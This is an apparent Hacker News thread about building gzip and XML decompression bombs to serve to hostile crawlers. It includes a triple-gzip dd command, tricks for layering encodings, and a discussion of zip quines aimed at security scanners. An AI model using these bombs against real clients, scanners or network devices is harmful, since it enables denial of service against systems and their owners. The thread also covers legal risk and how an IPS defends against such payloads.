Comment by colanderman

8 years ago

I would think Transfer-Encoding would be a better choice than Content-Encoding. It's processed at a lower level of the stack and must be decoded – Content-Encoding is generally only decoded if the client is specifically interested in whatever's inside the payload. (Note that you don't have to specify the large Content-Length in this case as it is implied by the transfer coding.)

Also worth trying is an XML bomb [1], though that's higher up the stack.

Of course you can combine all three in one payload (since it's more likely that lower levels of the stack implement streaming processing): gzip an XML bomb followed by a gigabyte of space characters, then gzip that followed by a gigabyte of NULs, then serve it up as application/xml with both Content-Encoding and Transfer-Encoding: gzip.

(Actually now that I think of it, even though a terabyte of NULs compresses to 1 GiB [2], I bet that file is itself highly compressible, or could be made to be if it's handcrafted. You could probably serve that up easily with a few MiB file using the above technique.)

EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)

[1] https://en.wikipedia.org/wiki/Billion_laughs

[2] https://superuser.com/questions/139253/what-is-the-maximum-c...

21 comments

colanderman

masklinn 8 years ago

> EDIT: In fact a 100 GiB version of such a payload compresses down do ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)

http://www.aerasec.de/security/advisories/decompression-bomb... has a triple-gziped 100GB file down to 6k, the double-gzipped version is 230k.

I'm trying on 1TB, but it turns out to take some time.

mirimir 8 years ago

> ... I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.
Sure. But gzip bombs don't do substantial (if any) permanent damage. At most, they'd crash the system. And indeed, that might attract the attention of owners, who might then discover that their devices had been compromised.
colanderman 8 years ago

You only get two gzips, not three :) (transfer and content codings)
Unless you're serving up XML which is itself zipped, such as an Open Office document. But most clients won't be looking for that.
Filligree 8 years ago
One useful trick is that, for gzip, d(z(x+y)) = d(z(x) + z(y)).
So you don't need to compress the entire terabyte.
- masklinn 8 years ago
  
  I'd expect that to provide a lower compression, though it may not matter given the additional followup gzips.
  The compression finally finished after 3h (on an old MBP), "dd if=/dev/zero bs=1m count=1m | gzip | gzip | gzip" yields a bit under 10k (10082 bytes), and adding a 4th gzip yields a bit under 4k (4004 bytes). The 5th gzip starts increasing the size of the archive.
  
  1 reply →
- colanderman 8 years ago
  
  That's true for the content stream but not gzip files themselves, which do have a minimal header.
  
  1 reply →

amenghra 8 years ago

If you are smart, you craft your compressed files to be infinite by making them Quines: https://alf.nu/ZipQuine

cyounkins 8 years ago
It's unlikely any of the parsers would apply recursive decompression, so a ZipQuine isn't going to help exhaust resources.
- vog 8 years ago
  
  Indeed. ZipQuines are not targeted against servers, but against middleware. More precisely, these try to attack certain kinds of "security scanners". Those security scanners want to unpack as much as possible, by design(!), otherwise bad code could hide behind yet another round of compressed container formats.
  
  1 reply →
- pinpeliponni 8 years ago
  
  At least none of the Java libraries seemed to fall for this when I tried.
- amenghra 8 years ago
  
  True. I wonder what's the largest file you can decompress to given some bound on the compressed result.

jwilk 8 years ago

Most (all?) user-agents don't set the TE header (which specifies the transfer encodings the UA is willing to accept), so I doubt they would bother to decode unsolicited "Transfer-Encoding: gzip".

mnarayan01 8 years ago
The Accept-Encoding header is used to specify the acceptable transfer encodings. Certainly all browsers set it, and most "advanced" frameworks will at least handle the common values of Transfer-Encoding regardless; a "malicious" crawler will almost certainly have to, as plenty of sites use Accept-Encoding along with User-Agent to block undesirable bots.
- colanderman 8 years ago
  
  No, Accept-Encoding pairs with Content-Encoding, not Transfer-Encoding (which is controlled by TE as GP indicated). [1] [2]
  [1] https://tools.ietf.org/html/rfc7231#section-5.3.4
  [2] https://tools.ietf.org/html/rfc7230#section-4.3
  
  1 reply →
colanderman 8 years ago

Good point, I didn't realize that.

rixrax 8 years ago

I wonder how these techniques play along with random IDS/IPS/deep packet inspection/WAF/AV/DLP/web cache/proxy/load balancer/etc. devices that happen to look/peak into traffic that passes through network. I would wager my $ that more than a couple will need some admin(istrative) care after running some of this stuff via them.

And btw -- when you end up accidentally crashing/DoS:ing your corporate WAF or ISPs DPI, who are they going to call?

colanderman 8 years ago

I worked on an IPS a few years back. It was specifically designed NOT to inflate arbitrary ZIP files. All decoders worked in a streaming fashion and were limited to a fixed (low) nesting depth and preallocated memory. Typically they would be configured to reject traffic such as the payload we've been discussing.